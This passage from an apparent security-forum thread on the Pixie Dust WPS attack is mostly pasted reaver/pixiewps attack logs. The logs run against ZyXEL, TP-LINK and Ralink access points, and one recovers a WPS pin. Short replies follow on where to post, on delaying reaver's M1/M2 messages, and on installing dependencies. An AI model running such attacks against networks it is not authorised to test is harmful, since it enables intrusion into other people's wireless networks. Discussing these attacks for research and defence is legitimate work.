    [P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
    [P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]
    http://imgur.com/fnrrZUn

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
    [P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37
    [P] WPS Manufacturer: ZyXEL
    [P] WPS Model Number: P-660W-T1 v3
    [P] Access Point Serial Number: 00000001
    [+] Received M1 message
    [P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b
    [P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
    [+] Sending M2 message
    [P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
    [P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]
    http://imgur.com/1MrIW4K

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
    [P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [P] Access Point Serial Number: 14CC200000*
    [+] Received M1 message
    [P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc
    [P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
    [+] Sending M2 message
    [P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
    [P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]


    AND this AP is VULNERABLE, pixie sees true values

    Code:
    Trying pin 12345670.
    .............................
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [+] Received M1 message
    [P] PKR: ................
    e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80
    [P] AuthKey: 
    [+] Sending M2 message
    [P] E-Hash1: 
    [P] E-Hash2: 
    [Pixie-Dust]  
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
    [Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
    [Pixie-Dust]   [+] WPS pin: 71632285
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    http://imgur.com/zlmrfjO

    I think this is the problem so Pixie not vulnerable, Realtek, Broadcom and Atheros chipsets ....

    I don't know, but probably
    Last edited by Saydamination; 2015-05-16 at 21:14.

  46. #46
    hello
    Hold on a second, my friend: this thread is to speak about the pixie dust attack "theoretically", not for reporting bugs using modified reaver (you have another thread for that).
    "Pixie sees wrong values."
    pixiewps (you have another thread to speak about it) does not "see" any value.
    Either you enter the value manually, or you use a script, or you are using the automated reaver (that is the case)...
    I suggest you post in the correct thread: Reaver modfication for Pixie Dust Attack
    cheers

  47. #47
    Quote Originally Posted by kcdtv View Post
    hello
    Hold on a second, my friend: this thread is to speak about the pixie dust attack "theoretically", not for reporting bugs using modified reaver (you have another thread for that).

    pixiewps (you have another thread to speak about it) does not "see" any value.
    Either you enter the value manually, or you use a script, or you are using the automated reaver (that is the case)...
    I suggest you post in the correct thread: Reaver modfication for Pixie Dust Attack
    cheers
    Thanks @kcdtv ..

    I will do it...

  48. #48
    Join Date
    2015-Apr
    Posts
    9
    Can someone please tell me how to make reaver delay between sending M1 and M2?

  49. #49

    Dependencies
    Code:
    sudo apt-get install libssl-dev
    sudo apt-get install libpcap-dev
    sudo apt-get install libsqlite3-dev

    Couldn't get libssl-dev; it's forbidden in the repository, as Kali is unable to update.
    I'm running the latest live version but still can't get the package.
    pixie is unable to install without ssl.
    Help me......

  50. #50
    Join Date
    2015-Mar
    Posts
    127
    What fixes, improvements will pixiewps 1.1 bring?
